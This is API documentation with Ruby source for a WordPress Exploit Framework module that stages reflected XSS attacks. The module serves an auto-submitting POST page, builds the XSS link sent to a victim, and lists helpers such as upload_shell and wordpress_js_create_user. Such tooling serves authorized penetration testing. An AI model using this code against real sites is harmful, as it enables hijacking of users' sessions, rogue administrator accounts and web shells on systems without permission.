Module: Wpxf::WordPress::StagedReflectedXss

Includes:
ReflectedXss
Defined in:
lib/wpxf/wordpress/staged_reflected_xss.rb

Overview

Provides reusable functionality for reflected XSS modules.

Instance Method Summary collapse

Methods included from Xss

#upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Instance Method Details

#create_basic_post_script(url, fields) ⇒ Object

Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.

Parameters:

  • url (String)

    the vulnerable URL.

  • fields (Hash)

    the fields and values to inject into the script.

[View source]

52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 52

def create_basic_post_script(url, fields)
  json = ''
  fields.each_with_index do |(k, v), i|
    if i < fields.size - 1
      json += "\"#{k}\": \"#{v}\",\n"
      next
    end

    json += "\"#{k}\": \"#{v}\"\n"
  end

  %|
    <html><head></head><body><script>
      #{js_post}
      post('#{url}', {
        #{json}
      });
    </script></body></html>
  |
end

#initial_req_pathString

Returns the path to use for the initial request.

Returns:

  • (String)

    the path to use for the initial request.

[View source]

21
22
23
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 21

def initial_req_path
  normalized_option_value('initial_req_path')
end

#initial_scriptString

Returns the initial script that should be served to automate a form submission to the vulnerable page.

Returns:

  • (String)

    the initial script that should be served to automate a form submission to the vulnerable page.

[View source]

45
46
47
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 45

def initial_script
  nil
end

#initializeObject

Initialize a new instance of Wpxf::WordPress::StagedReflectedXss.

[View source]

8
9
10
11
12
13
14
15
16
17
18
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 8

def initialize
  super
  register_option(
    StringOption.new(
      name: 'initial_req_path',
      desc: 'The path to be used to identify the initial request',
      required: true,
      default: Utility::Text.rand_alpha(rand(5..10))
    )
  )
end

#on_http_request(path, params, headers) ⇒ String

Invoked when a HTTP request is made to the server.

Parameters:

  • path (String)

    the path requested.

  • params (Hash)

    the query string parameters.

  • headers (Hash)

    the HTTP headers.

Returns:

  • (String)

    the response body to send to the client.

[View source]

30
31
32
33
34
35
36
37
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 30

def on_http_request(path, params, headers)
  if path.eql? normalize_uri(xss_path, initial_req_path)
    emit_info 'Initial request received...'
    { type: 'text/html', body: initial_script }
  else
    super
  end
end

#runBoolean

Run the module.

Returns:

  • (Boolean)

    true if successful.

[View source]

75
76
77
78
79
80
81
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 75

def run
  if initial_script.nil?
    raise 'Required method "initial_script" has not been implemented'
  end

  super
end

#url_with_xssString

Returns the URL to send the user to which contains the XSS vector.

Returns:

  • (String)

    the URL to send the user to which contains the XSS vector.

[View source]

40
41
42
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 40

def url_with_xss
  normalize_uri(xss_url, initial_req_path)
end